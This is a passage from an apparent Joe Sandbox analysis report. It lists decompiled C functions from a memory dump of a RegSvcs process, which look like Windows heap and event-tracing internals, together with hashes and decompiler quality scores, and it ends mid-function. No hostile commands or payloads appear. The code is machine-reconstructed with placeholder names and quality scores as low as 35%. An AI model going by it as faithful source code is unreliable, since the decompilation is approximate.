                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                          • Instruction ID: 7ed430ee993ce1f275c1f43d88ef0ad5f91431b684db3fedf54086b00515da75
                                          • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                          • Instruction Fuzzy Hash: CC21A472600129FFD725DF5DCD80EABBBBDEF85698F154055EA09E7210D634AE01C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 77%
                                          			E01376C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                          				signed short* _v8;
                                          				signed char _v12;
                                          				void* _t22;
                                          				signed char* _t23;
                                          				intOrPtr _t24;
                                          				signed short* _t44;
                                          				void* _t47;
                                          				signed char* _t56;
                                          				signed char* _t58;
                                          
                                          				_t48 = __ecx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t44 = __ecx;
                                          				_v12 = __edx;
                                          				_v8 = __ecx;
                                          				_t22 = E01317D50();
                                          				_t58 = 0x7ffe0384;
                                          				if(_t22 == 0) {
                                          					_t23 = 0x7ffe0384;
                                          				} else {
                                          					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          				}
                                          				if( *_t23 != 0) {
                                          					_t24 =  *0x13e7b9c; // 0x0
                                          					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                          					_t23 = L01314620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                          					_t56 = _t23;
                                          					if(_t56 != 0) {
                                          						_t56[0x24] = _a4;
                                          						_t56[0x28] = _a8;
                                          						_t56[6] = 0x1420;
                                          						_t56[0x20] = _v12;
                                          						_t14 =  &(_t56[0x2c]); // 0x2c
                                          						E0133F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                          						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                          						if(E01317D50() != 0) {
                                          							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          						}
                                          						_push(_t56);
                                          						_push(_t47 - 0x20);
                                          						_push(0x402);
                                          						_push( *_t58 & 0x000000ff);
                                          						E01339AE0();
                                          						_t23 = L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                          					}
                                          				}
                                          				return _t23;
                                          			}













                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 000257ac12b9e65c93f9d2df7359b8b3da861e89a197ef13c45dd96e115de04c
                                          • Instruction ID: 0d67cb2145b226816a1d292b3fdb52647971d223989fbc341d04a5858eacd4f7
                                          • Opcode Fuzzy Hash: 000257ac12b9e65c93f9d2df7359b8b3da861e89a197ef13c45dd96e115de04c
                                          • Instruction Fuzzy Hash: 3A21ADB1A00A45AFDB25DB6CD880F6AB7B8FF48748F040069F904C7790D638ED10CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E013390AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                          				intOrPtr* _v0;
                                          				void* _v8;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				char _v36;
                                          				void* _t38;
                                          				intOrPtr _t41;
                                          				void* _t44;
                                          				signed int _t45;
                                          				intOrPtr* _t49;
                                          				signed int _t57;
                                          				signed int _t58;
                                          				intOrPtr* _t59;
                                          				void* _t62;
                                          				void* _t63;
                                          				void* _t65;
                                          				void* _t66;
                                          				signed int _t69;
                                          				intOrPtr* _t70;
                                          				void* _t71;
                                          				intOrPtr* _t72;
                                          				intOrPtr* _t73;
                                          				char _t74;
                                          
                                          				_t65 = __edx;
                                          				_t57 = _a4;
                                          				_t32 = __ecx;
                                          				_v8 = __edx;
                                          				_t3 = _t32 + 0x14c; // 0x14c
                                          				_t70 = _t3;
                                          				_v16 = __ecx;
                                          				_t72 =  *_t70;
                                          				while(_t72 != _t70) {
                                          					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                          						L24:
                                          						_t72 =  *_t72;
                                          						continue;
                                          					}
                                          					_t30 = _t72 + 0x10; // 0x10
                                          					if(E0134D4F0(_t30, _t65, _t57) == _t57) {
                                          						return 0xb7;
                                          					}
                                          					_t65 = _v8;
                                          					goto L24;
                                          				}
                                          				_t61 = _t57;
                                          				_push( &_v12);
                                          				_t66 = 0x10;
                                          				if(E0132E5E0(_t57, _t66) < 0) {
                                          					return 0x216;
                                          				}
                                          				_t73 = L01314620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                          				if(_t73 == 0) {
                                          					_t38 = 0xe;
                                          					return _t38;
                                          				}
                                          				_t9 = _t73 + 0x10; // 0x10
                                          				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                          				E0133F3E0(_t9, _v8, _t57);
                                          				_t41 =  *_t70;
                                          				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                          					_t62 = 3;
                                          					asm("int 0x29");
                                          					_push(_t62);
                                          					_push(_t57);
                                          					_push(_t73);
                                          					_push(_t70);
                                          					_t71 = _t62;
                                          					_t74 = 0;
                                          					_v36 = 0;
                                          					_t63 = E0132A2F0(_t62, _t71, 1, 6,  &_v36);
                                          					if(_t63 == 0) {
                                          						L20:
                                          						_t44 = 0x57;
                                          						return _t44;
                                          					}
                                          					_t45 = _v12;
                                          					_t58 = 0x1c;
                                          					if(_t45 < _t58) {
                                          						goto L20;
                                          					}
                                          					_t69 = _t45 / _t58;
                                          					if(_t69 == 0) {
                                          						L19:
                                          						return 0xe8;
                                          					}
                                          					_t59 = _v0;
                                          					do {
                                          						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                          							goto L18;
                                          						}
                                          						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                          						 *_t59 = _t49;
                                          						if( *_t49 != 0x53445352) {
                                          							goto L18;
                                          						}
                                          						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                          						return 0;
                                          						L18:
                                          						_t63 = _t63 + 0x1c;
                                          						_t74 = _t74 + 1;
                                          					} while (_t74 < _t69);
                                          					goto L19;
                                          				}
                                          				 *_t73 = _t41;
                                          				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                          				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                          				 *_t70 = _t73;
                                          				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                          				return 0;
                                          			}



























                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                          • Instruction ID: 7afc513a742e2e5b88fb24914180efe4dde2d298e59181dc3e0d2f27d658ec24
                                          • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                          • Instruction Fuzzy Hash: 26218671A00205EFD721DF59C444E6AF7F8EB54318F14846AE945A7210D370ED40CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 59%
                                          			E01323B7A(void* __ecx) {
                                          				signed int _v8;
                                          				char _v12;
                                          				intOrPtr _v20;
                                          				intOrPtr _t17;
                                          				intOrPtr _t26;
                                          				void* _t35;
                                          				void* _t38;
                                          				void* _t41;
                                          				intOrPtr _t44;
                                          
                                          				_t17 =  *0x13e84c4; // 0x0
                                          				_v12 = 1;
                                          				_v8 =  *0x13e84c0 * 0x4c;
                                          				_t41 = __ecx;
                                          				_t35 = L01314620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x13e84c0 * 0x4c);
                                          				if(_t35 == 0) {
                                          					_t44 = 0xc0000017;
                                          				} else {
                                          					_push( &_v8);
                                          					_push(_v8);
                                          					_push(_t35);
                                          					_push(4);
                                          					_push( &_v12);
                                          					_push(0x6b);
                                          					_t44 = E0133AA90();
                                          					_v20 = _t44;
                                          					if(_t44 >= 0) {
                                          						E0133FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x13e84c0 * 0xc);
                                          						_t38 = _t35;
                                          						if(_t35 < _v8 + _t35) {
                                          							do {
                                          								asm("movsd");
                                          								asm("movsd");
                                          								asm("movsd");
                                          								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                          							} while (_t38 < _v8 + _t35);
                                          							_t44 = _v20;
                                          						}
                                          					}
                                          					_t26 =  *0x13e84c4; // 0x0
                                          					L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                          				}
                                          				return _t44;
                                          			}













                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 71a6289c59b257708a44127000c3ab76106438144a851db1fcc14cc740b5dca8
                                          • Instruction ID: 2a8b210f227ba450550272c1abf0488131e469fdc4ffa38f86c82077a4648f44
                                          • Opcode Fuzzy Hash: 71a6289c59b257708a44127000c3ab76106438144a851db1fcc14cc740b5dca8
                                          • Instruction Fuzzy Hash: 5721A472A00219AFDB15DF58CD81F5ABBBDFB44748F1500A8E504EB251D375ED01DB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 80%
                                          			E01376CF0(void* __edx, intOrPtr _a4, short _a8) {
                                          				char _v8;
                                          				char _v12;
                                          				char _v16;
                                          				char _v20;
                                          				char _v28;
                                          				char _v36;
                                          				char _v52;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				signed char* _t21;
                                          				void* _t24;
                                          				void* _t36;
                                          				void* _t38;
                                          				void* _t46;
                                          
                                          				_push(_t36);
                                          				_t46 = __edx;
                                          				_v12 = 0;
                                          				_v8 = 0;
                                          				_v20 = 0;
                                          				_v16 = 0;
                                          				if(E01317D50() == 0) {
                                          					_t21 = 0x7ffe0384;
                                          				} else {
                                          					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                                          				}
                                          				if( *_t21 != 0) {
                                          					_t21 =  *[fs:0x30];
                                          					if((_t21[0x240] & 0x00000004) != 0) {
                                          						if(E01317D50() == 0) {
                                          							_t21 = 0x7ffe0385;
                                          						} else {
                                          							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                                          						}
                                          						if(( *_t21 & 0x00000020) != 0) {
                                          							_t56 = _t46;
                                          							if(_t46 == 0) {
                                          								_t46 = 0x12d5c80;
                                          							}
                                          							_push(_t46);
                                          							_push( &_v12);
                                          							_t24 = E0132F6E0(_t36, 0, _t46, _t56);
                                          							_push(_a4);
                                          							_t38 = _t24;
                                          							_push( &_v28);
                                          							_t21 = E0132F6E0(_t38, 0, _t46, _t56);
                                          							if(_t38 != 0) {
                                          								if(_t21 != 0) {
                                          									E01377016(_a8, 0, 0, 0,  &_v36,  &_v28);
                                          									L01312400( &_v52);
                                          								}
                                          								_t21 = L01312400( &_v28);
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t21;
                                          			}




















                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cde4a9bcb4be39845a0ef79a8bb5b99beed10a34cb544c0a68fca509488f3ae5
                                          • Instruction ID: 3af1a3e982d090433fb725c2a483e650bf84431692d3a8d11712218a665a59f6
                                          • Opcode Fuzzy Hash: cde4a9bcb4be39845a0ef79a8bb5b99beed10a34cb544c0a68fca509488f3ae5
                                          • Instruction Fuzzy Hash: 6A21F5B2510A459FE321EF6DC944F6BBBECEF91648F040556F940C7251DB38C548C6A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 67%
                                          			E013C070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                          				char _v8;
                                          				intOrPtr _v11;
                                          				signed int _v12;
                                          				intOrPtr _v15;
                                          				signed int _v16;
                                          				intOrPtr _v28;
                                          				void* __ebx;
                                          				char* _t32;
                                          				signed int* _t38;
                                          				signed int _t60;
                                          
                                          				_t38 = __ecx;
                                          				_v16 = __edx;
                                          				_t60 = E013C07DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                          				if(_t60 != 0) {
                                          					_t7 = _t38 + 0x38; // 0x29cd5903
                                          					_push( *_t7);
                                          					_t9 = _t38 + 0x34; // 0x6adeeb00
                                          					_push( *_t9);
                                          					_v12 = _a8 << 0xc;
                                          					_t11 = _t38 + 4; // 0x5de58b5b
                                          					_push(0x4000);
                                          					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                          					E013BAFDE( &_v8,  &_v12);
                                          					E013C1293(_t38, _v28, _t60);
                                          					if(E01317D50() == 0) {
                                          						_t32 = 0x7ffe0380;
                                          					} else {
                                          						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          					}
                                          					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                          						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                          						E013B14FB(_t38,  *_t21, _v11, _v15, 0xd);
                                          					}
                                          				}
                                          				return  ~_t60;
                                          			}














                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                          • Instruction ID: 01c5294f57bf8416323faa60434111989fcb082da2d3d735fb1bcbd0afb65167
                                          • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                          • Instruction Fuzzy Hash: 8121223A2042449FD709DF1CC880AAABBA6EBD0B54F04852DFA949B381D630DD09CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 35%
                                          			E013C2EF7(void* __ecx, signed int __edx, void* _a8, signed int _a12) {
                                          				char _v5;
                                          				unsigned int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v32;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				intOrPtr _v52;
                                          				intOrPtr _v56;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				void* _v68;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t62;
                                          				void* _t71;
                                          				signed int _t94;
                                          				signed int _t105;
                                          				signed int _t106;
                                          				void* _t107;
                                          				signed int _t114;
                                          				signed int _t115;
                                          				signed int _t141;
                                          				signed int _t142;
                                          				signed char _t145;
                                          				signed char _t146;
                                          				void* _t154;
                                          				signed int _t155;
                                          				void* _t156;
                                          				signed int _t160;
                                          				signed int _t164;
                                          				void* _t165;
                                          				signed int _t172;
                                          				signed int _t174;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t105 = __edx;
                                          				_t154 = __ecx;
                                          				_t160 =  *__edx ^ __edx;
                                          				_t141 =  *(__edx + 4) ^ __edx;
                                          				if(( *(_t160 + 4) ^ _t160) != __edx || ( *_t141 ^ _t141) != __edx) {
                                          					_t114 = 3;
                                          					asm("int 0x29");
                                          					_t174 = (_t172 & 0xfffffff8) - 0x24;
                                          					_t62 =  *0x13ed360 ^ _t174;
                                          					_v32 = _t62;
                                          					_push(_t105);
                                          					_push(_t160);
                                          					_t106 = _t114;
                                          					_t115 = _v20;
                                          					_push(_t154);
                                          					_t155 = _t141;
                                          					_t142 = _v16;
                                          					__eflags = _t115;
                                          					if(__eflags != 0) {
                                          						asm("bsf esi, ecx");
                                          					} else {
                                          						asm("bsf esi, edx");
                                          						_t62 = (_t62 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff;
                                          						__eflags = _t62;
                                          						if(_t62 == 0) {
                                          							_t160 = _v44;
                                          						} else {
                                          							_t160 = _t160 + 0x20;
                                          						}
                                          					}
                                          					__eflags = _t142;
                                          					if(__eflags == 0) {
                                          						asm("bsr eax, ecx");
                                          					} else {
                                          						asm("bsr ecx, edx");
                                          						if(__eflags == 0) {
                                          							_t62 = _v44;
                                          						} else {
                                          							_t27 = _t115 + 0x20; // 0x20
                                          							_t62 = _t27;
                                          						}
                                          					}
                                          					_v56 = (_t160 << 0xc) + _t155;
                                          					_v60 = _t62 - _t160 + 1 << 0xc;
                                          					_t71 = E0133D0F0(1, _t62 - _t160 + 1, 0);
                                          					asm("adc edx, 0xffffffff");
                                          					_v52 = E0133D0F0(_t71 + 0xffffffff, _t160, 0);
                                          					_v48 = 0;
                                          					_v44 = _t155 + 0x10;
                                          					E01312280(_t155 + 0x10, _t155 + 0x10);
                                          					__eflags = _a12;
                                          					_push(_v64);
                                          					_push(_v60);
                                          					_push( *((intOrPtr*)(_t106 + 0x20)));
                                          					if(_a12 == 0) {
                                          						 *0x13eb1e0();
                                          						 *( *(_t106 + 0x30) ^  *0x13e6110 ^ _t106)();
                                          						 *(_t155 + 0xc) =  *(_t155 + 0xc) &  !_v60;
                                          						_t54 = _t155 + 8;
                                          						 *_t54 =  *(_t155 + 8) &  !_v64;
                                          						__eflags =  *_t54;
                                          						goto L18;
                                          					} else {
                                          						 *0x13eb1e0();
                                          						_t164 =  *( *(_t106 + 0x2c) ^  *0x13e6110 ^ _t106)();
                                          						__eflags = _t164;
                                          						if(_t164 >= 0) {
                                          							 *(_t155 + 8) =  *(_t155 + 8) | _v64;
                                          							 *(_t155 + 0xc) =  *(_t155 + 0xc) | _v60;
                                          							L18:
                                          							asm("lock xadd [eax], ecx");
                                          							_t164 = 0;
                                          							__eflags = 0;
                                          						}
                                          					}
                                          					E0130FFB0(_t106, _t155, _v56);
                                          					_pop(_t156);
                                          					_pop(_t165);
                                          					_pop(_t107);
                                          					__eflags = _v48 ^ _t174;
                                          					return E0133B640(_t164, _t107, _v48 ^ _t174, 0, _t156, _t165);
                                          				} else {
                                          					_t94 = _t141 ^ _t160;
                                          					 *_t141 = _t94;
                                          					 *(_t160 + 4) = _t94;
                                          					_t145 =  !( *(__edx + 8));
                                          					_t146 = _t145 >> 8;
                                          					_v12 = _t146 >> 8;
                                          					_v5 =  *((intOrPtr*)((_t145 & 0x000000ff) + 0x12dac00)) +  *((intOrPtr*)((_t146 & 0x000000ff) + 0x12dac00));
                                          					asm("lock xadd [eax], edx");
                                          					return __ecx + 0x18;
                                          				}
                                          			}







































                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 19e0b604bcd7da19dcfd9aa464e98e78cd8d42d453e17fb47406c4b6b2dcef4b
                                          • Instruction ID: 6fc69e2485e8e1fa5029e6108c1bdbc781b2efaff2edbbe24dc3892470752c7f
                                          • Opcode Fuzzy Hash: 19e0b604bcd7da19dcfd9aa464e98e78cd8d42d453e17fb47406c4b6b2dcef4b
                                          • Instruction Fuzzy Hash: 7021DA712041500FD705CF1AC8E59B6BFE5EFC613235A81E9E988CB793C924991BC7A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E0132ABD8(void* __ecx) {
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				signed int _t18;
                                          				signed char _t22;
                                          				intOrPtr _t31;
                                          				signed char _t34;
                                          				signed char _t42;
                                          				unsigned int _t44;
                                          				void* _t49;
                                          				signed int* _t53;
                                          
                                          				_push(__ecx);
                                          				_t49 = __ecx;
                                          				_t18 = __ecx + 0xc0;
                                          				_t31 =  *((intOrPtr*)(_t18 + 4));
                                          				while(_t31 != _t18) {
                                          					_t9 = _t31 - 8; // -8
                                          					_t53 = _t9;
                                          					if( *(_t49 + 0x4c) != 0) {
                                          						_t44 =  *(_t49 + 0x50) ^  *_t53;
                                          						 *_t53 = _t44;
                                          						_t38 = _t44 >> 0x00000010 ^ _t44 >> 0x00000008 ^ _t44;
                                          						if(_t44 >> 0x18 != (_t44 >> 0x00000010 ^ _t44 >> 0x00000008 ^ _t44)) {
                                          							E013AFA2B(_t31, _t49, _t53, _t49, _t53, __eflags, _t38);
                                          						}
                                          					}
                                          					_t34 =  *_t53 & 0x0000ffff;
                                          					_t18 = 0x200;
                                          					_t42 = _t34 >> 8;
                                          					if(_t34 <= 0x200) {
                                          						__eflags =  *(_t49 + 0x4c);
                                          						if( *(_t49 + 0x4c) != 0) {
                                          							_t53[0] = _t53[0] ^ _t42 ^ _t34;
                                          							_t18 =  *(_t49 + 0x50);
                                          							 *_t53 =  *_t53 ^ _t18;
                                          							__eflags =  *_t53;
                                          						}
                                          						break;
                                          					}
                                          					_t22 = _t53[0];
                                          					if((_t22 & 0x00000008) != 0) {
                                          						__eflags =  *(_t49 + 0x4c);
                                          						if(__eflags != 0) {
                                          							_t53[0] = _t22 ^ _t42 ^ _t34;
                                          							 *_t53 =  *_t53 ^  *(_t49 + 0x50);
                                          							__eflags =  *_t53;
                                          						}
                                          					} else {
                                          						E0132AC7B(_t49, _t53);
                                          					}
                                          					_t31 =  *((intOrPtr*)(_t31 + 4));
                                          					_t18 = _t49 + 0xc0;
                                          				}
                                          				return _t18;
                                          			}
















                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6d1d207ce53efa8c22bf27fbc4c7e5f30861c9883542d2abfefc5c8e464cac72
                                          • Instruction ID: e58aaea45ee97588d61515fdde74b49b0efe0a0990df9c36f99e9764f721ae95
                                          • Opcode Fuzzy Hash: 6d1d207ce53efa8c22bf27fbc4c7e5f30861c9883542d2abfefc5c8e464cac72
                                          • Instruction Fuzzy Hash: 33210A312006369BDF28AF2DC4846F2BBD9FF99309F54811AD5D5C7A41D730B80ADB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E01377794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _t21;
                                          				void* _t24;
                                          				intOrPtr _t25;
                                          				void* _t36;
                                          				short _t39;
                                          				signed char* _t42;
                                          				unsigned int _t46;
                                          				void* _t50;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t21 =  *0x13e7b9c; // 0x0
                                          				_t46 = _a8;
                                          				_v12 = __edx;
                                          				_v8 = __ecx;
                                          				_t4 = _t46 + 0x2e; // 0x2e
                                          				_t36 = _t4;
                                          				_t24 = L01314620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                                          				_t50 = _t24;
                                          				if(_t50 != 0) {
                                          					_t25 = _a4;
                                          					if(_t25 == 5) {
                                          						L3:
                                          						_t39 = 0x14b1;
                                          					} else {
                                          						_t39 = 0x14b0;
                                          						if(_t25 == 6) {
                                          							goto L3;
                                          						}
                                          					}
                                          					 *((short*)(_t50 + 6)) = _t39;
                                          					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                                          					_t11 = _t50 + 0x2c; // 0x2c
                                          					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                                          					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                                          					E0133F3E0(_t11, _a12, _t46);
                                          					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                                          					if(E01317D50() == 0) {
                                          						_t42 = 0x7ffe0384;
                                          					} else {
                                          						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          					}
                                          					_push(_t50);
                                          					_t19 = _t36 - 0x20; // 0xe
                                          					_push(0x403);
                                          					_push( *_t42 & 0x000000ff);
                                          					E01339AE0();
                                          					_t24 = L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                                          				}
                                          				return _t24;
                                          			}














                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 49ce2574adcf4907c97aab7eacb92a80114ea003c32853db1d74dabd083970d2
                                          • Instruction ID: 0da9eee45984361ad6ce42dbe807447ed74bfef29810e3e4ff9bd28fd1a9e506
                                          • Opcode Fuzzy Hash: 49ce2574adcf4907c97aab7eacb92a80114ea003c32853db1d74dabd083970d2
                                          • Instruction Fuzzy Hash: 0521AE72900644AFC725DF69D884EABBBBDEF88344F14056DF60AC7760D638E900CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 77%
                                          			E013C1FF1(void* __ecx, intOrPtr __edx, signed int _a4) {
                                          				intOrPtr _v8;
                                          				signed int _t22;
                                          				signed int _t34;
                                          				signed int _t38;
                                          				signed int _t41;
                                          				signed int _t42;
                                          				signed int _t44;
                                          				signed int _t54;
                                          				signed int _t55;
                                          
                                          				_t44 = _a4;
                                          				_v8 = __edx;
                                          				_t3 = _t44 + 0x1007; // 0x1007
                                          				_t41 = _t3 & 0xfffff000;
                                          				_t54 = ( *_t44 ^  *0x13e6110 ^ _t44) >> 0x00000001 & 0x00007fff;
                                          				if(_t41 - _t44 < _t54 << 3) {
                                          					_t42 = _t41 + 0xfffffff0;
                                          					_t34 = _t42 - _t44 >> 3;
                                          					_t55 = _t54 - _t34;
                                          					 *_t44 =  *_t44 ^ (_t34 + _t34 ^  *_t44 ^  *0x13e6110 ^ _t44) & 0x0000fffe;
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
                                          					asm("stosd");
